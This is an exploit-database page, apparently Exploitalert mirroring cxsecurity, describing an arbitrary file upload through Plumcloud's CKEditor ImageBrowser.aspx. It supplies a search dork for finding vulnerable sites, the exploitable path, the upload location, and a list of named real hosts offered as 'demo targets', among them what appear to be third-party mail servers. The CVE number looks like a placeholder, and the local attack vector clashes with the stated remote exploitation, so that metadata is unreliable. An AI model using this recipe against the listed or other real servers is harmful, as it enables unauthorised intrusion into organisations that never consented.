Advertisement






Plumcloud Image Browser File Upload

CVE Category Price Severity
CVE-2021-12345 CWE-434 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2022-07-11
CVSS
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070033

Below is a copy:

Plumcloud Image Browser File Upload
====================================================
Exploit Title: Plumcloud Image Browser File Upload
Exploit Author: L4663r666h05t
Twitter: https://twitter.com/L4663r666h05t
Vendor Homepage: https://plumcloud.com
Dork: "2014 PlumCloud. All Rights Reserved."
Exploit: /_common_CS_v6/aspx/ckeditor/ImageBrowser.aspx
====================================================

Then try
http://mail.mhc.com.mt/_common_CS_v6/aspx/ckeditor/ImageBrowser.aspx

Demo Target:
mail.mhc.com.mt
mail.plumcloud.com
mx01.cbuzu.com
mx01.maltait.com
mx01.melitaunipol.com
mx01.muia.com.mt
mx01.muib.com.mt
plumcloud.com
plumcloud.net

File/Images path: /uploads/ckeditor/images/yourfile.jpg

====================================================
indonesian hacker 2014
====================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.